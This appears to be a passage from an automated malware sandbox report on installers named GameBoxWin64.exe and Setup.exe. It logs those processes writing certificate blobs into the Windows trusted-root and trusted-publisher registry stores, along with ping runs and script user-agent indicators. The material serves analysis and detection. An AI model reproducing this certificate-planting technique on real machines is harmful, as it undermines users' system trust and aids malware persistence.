5131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be GameBoxWin64.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Setup (19).exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Setup (19).exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f GameBoxWin64.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2532 PING.EXE 8292 PING.EXE -
Script User-Agent 32 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 207 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 441 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 139 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 143 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 193 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 209 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 345 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 134 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 338 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 445 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 138 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 206 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 210 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 223 Mozilla/4.0 